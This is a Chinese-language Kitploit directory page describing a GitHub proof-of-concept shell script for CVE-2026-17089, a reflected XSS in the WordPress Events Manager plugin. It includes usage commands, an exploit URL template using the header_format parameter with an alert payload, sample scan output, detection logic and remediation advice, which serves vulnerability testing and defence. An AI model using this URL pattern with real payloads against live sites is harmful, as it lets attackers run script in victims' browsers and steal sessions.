Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-17089-PoC-pwnVader — 针对 CVE-2026-17089 的 Shell PoC,这是 WordPress Events Manager 插件(<= 7.4.0.1)中的一个未认证反射型 XSS 漏洞;该脚本可对插件进行指纹识别并测试 header_format 反射。 | Kitploit
工具/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
漏洞扫描器Web漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHub
pwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

针对 CVE-2026-17089 的 Shell PoC,这是 WordPress Events Manager 插件(<= 7.4.0.1)中的一个未认证反射型 XSS 漏洞;该脚本可对插件进行指纹识别并测试 header_format 反射。

查看仓库
10天前尚未审核
分享

CVE-2026-17089 — Events Manager <= 7.4.0.1 — 未认证反射型 XSS(header_format)

作者: pwnVader · 许可证: MIT(仓库根目录)

组件Events Manager – Calendar, Bookings, Tickets, and more!(WordPress 插件)
类型CWE-79 — 反射型跨站脚本
受影响版本<= 7.4.0.1
修复版本后续 7.4.x 版本(在 EM_Events::output_grouped() 中应用了 wp_kses_post())
CVECVE-2026-17089 — CVSS 3.1 6.1(AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

概述

短代码入口点使用 wp_kses() 对 header_format 进行清理,但未认证的 AJAX 操作 search_events_grouped 绕过了该清理,并将该值回显到 HTML 响应中(EM_Events::output_grouped())。远程未认证攻击者可以构造一个 URL, 使任何打开该 URL 的用户在受影响站点的源下执行任意 JavaScript (UI:R)。

用法

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

示例输出(check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

利用 URL

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

检测逻辑

  1. 指纹识别:readme.txt(Stable tag)和/或插件资源路径 /wp-content/plugins/events-manager/includes/js/events-manager.js。
  2. 向 admin-ajax.php?action=search_events_grouped 发送一个无害标记 (``),将 header_format 设置为该标记,并检查 原始标记是否在响应体中被未转义地反射。

修复建议

  • 将 Events Manager 更新至当前版本(该修复在渲染函数内部对 header_format 应用 wp_kses_post(),覆盖所有调用方)。
  • 临时措施:在 WAF/应用层阻止未认证的 search_events_grouped AJAX 操作或过滤 header_format。

参考资料

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

免责声明

仅用于授权的安全测试。该 PoC 为只读(check)或打印 URL(url);不会修改 任何数据。

下载工具